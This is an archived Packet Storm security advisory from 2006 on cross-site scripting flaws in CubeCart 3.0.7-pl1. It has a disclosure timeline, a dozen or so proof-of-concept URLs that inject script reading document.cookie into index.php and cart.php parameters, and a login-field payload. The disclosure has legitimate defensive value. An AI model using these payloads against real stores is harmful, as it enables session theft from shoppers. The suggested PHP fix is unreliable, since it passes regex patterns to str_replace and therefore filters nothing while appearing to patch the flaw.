Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormLostmonPACKETSTORM:43259
HistoryJan 22, 2006 - 12:00 a.m.

cubecartXSS.txt

2006-01-2200:00:00
Lostmon
packetstormsecurity.com
16
JSON
`################################################  
CubeCart 3.0.7-pl1 multiple variable Cross site scripting  
Vendor url: www.cubecart.com  
bug report:http://bugs.cubecart.com/?do=details&id=459  
Advisore:http://lostmon.blogspot.com/2006/01/  
cubecart-307-pl1-indexphp-multiple.html.  
vendor notify:yes exploit avalable: yes  
################################################  
  
I recomended to all vendors to look this paper..  
This is the new posible impact of XSS atacks:  
  
http://www.bindshell.net/papers/xssv.html  
  
CubeCart contains a flaw that allows a remote cross site scripting  
attack.This flaw exists because the application does not validate  
some variables upon submission to 'index.php' scripts.  
This could allow a user to create a specially crafted URL that  
would execute arbitrary code in a user's browser within the trust  
relationship between the browser and the server,leading to a  
loss of integrity.  
  
###############  
VERSIONS  
###############  
  
CubeCart 3.0.7-pl1 vulnerable.  
Other versions are posible vulnerables too  
  
#################  
Timeline  
#################  
  
Discovered: 24 dec 2005  
vendor notify: 10-01-2006  
Vendor response:  
Solution:  
Disclosure: 10-01-2006  
Public disclosure:16-01-2006  
  
###############  
Examples:  
###############  
  
  
http://victim]/cc3/cart.php?act=reg&redir=L3NpdGUvZGVt  
by9jYzMvaW5kZXgucGhwP3NlYXJjaFN0cj0lMjIlM0UlM0NzY3JpcH  
QlM0VhbGVydCUyOCUyOSUzQyUyRnNjcmlwdCUzRSZhbXA7YWN0PXZpZ  
XdDYXQmYW1wO1N1Ym1pdD1Hbw===%3D%22%3E%3Cscript  
%3Ealert%28document.cookie%29%3C%2Fscript%3E  
  
http://[victim]/cc3/cart.php?act=reg&redir==%3D%22%3E%3Cscript  
%3Ealert%28document.cookie%29%3C%2Fscript%3E  
  
  
http://[victim]cc3/index.php?searchStr=%3D%22%3E%3Cscript  
%3Ealert%28document.cookie%29%3C%2Fscript%3E&act=viewCat  
&Submit=Go  
  
http://[victim]cc3/index.php?act=login&redir=L3NpdG  
UvZGVtby9jYzMvaW5kZXgucGhwP2FjdD12aWV3RG9jJmFtcDtkb  
2NJZD0x=%3D%22%3E%3Cscript  
%3Ealert%28document.cookie%29%3C%2Fscript%3E  
  
http://victim]/cc3/index.php?act=viewProd&productId=1"><script>  
alert(document.cookie)</script>  
  
http://victim]/cc3/index.php?act=viewDoc&docId=3"><script>  
alert(document.cookie)</script>  
  
http://victim]/cc3/index.php?act=viewProd"><script>  
alert(document.cookie)</script>  
  
http://victim]/cc3/index.php?act=viewCat&catId=1"><script>  
alert(document.cookie)</script>  
  
http://victim]/cc3/index.php?act=viewCat&catId=saleItems"><script>  
alert(document.cookie)</script>  
  
http://victim]/cc3/index.php?searchStr=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&act=viewCat  
  
http://victim]/cc3/index.php?act=viewDoc&docId=1"><script>  
alert(document.cookie)</script>  
  
#################  
User field XSS  
#################  
Go to http://victim]/cc3/index.php?act=login  
and inser in the username field this: "><script>  
alert(document.cookie)</script>  
  
#############  
SOLUTION  
#############  
  
no solution was available at this time  
  
currently i found a posible fix :  
  
if we look in includes/functions.inc.php for function treatGet($text)  
arround line 85 i change the original code to this other.  
  
it removes all posible html code inserted ...  
  
function treatGet($text){  
$text= str_replace(array ("@<script[^>]*?>.*?</script>@si",  
"@<[\/\!]*?[^<>]*?>@si",  
"@([\r\n])[\s]+@",  
"@&(quot|#34);@i",  
"@&(amp|#38);@i",  
"@&(lt|#60);@i",  
"@&(gt|#62);@i",  
"@&(nbsp|#160);@i",  
"@&(iexcl|#161);@i",  
"@&(cent|#162);@i",  
"@&(pound|#163);@i",  
"@&(copy|#169);@i",  
"@&#(\d+);@e"),"",$text);  
return $text;  
}  
  
close, save and upload the new file...  
  
  
  
arround line 80 in index.php we found :  
  
if(isset($_GET['searchStr'])){  
$body->assign("SEARCHSTR",treatGet($_GET['searchStr']));  
} else {  
$body->assign("SEARCHSTR","");  
}  
  
  
this can be replace for:  
  
$_GET['searchStr'] = treatGet($_GET['searchStr']);  
if(isset($_GET['searchStr'])){  
$body->assign("SEARCHSTR",$_GET['searchStr']);  
} else {  
$body->assign("SEARCHSTR","");  
}  
---------------------------------------  
  
close,save and upload it.  
this only fix searchStr param , but you can search in  
the source code for fix the other functions....  
  
  
##################### Β€nd ########################  
  
Thnx to estrella to be my ligth  
Thnx to all manglers of http://www.osvdb.org  
  
--  
atentamente:  
Lostmon ([email protected])  
Web-Blog: http://lostmon.blogspot.com/  
--  
La curiosidad es lo que hace mover la mente....  
`
JSON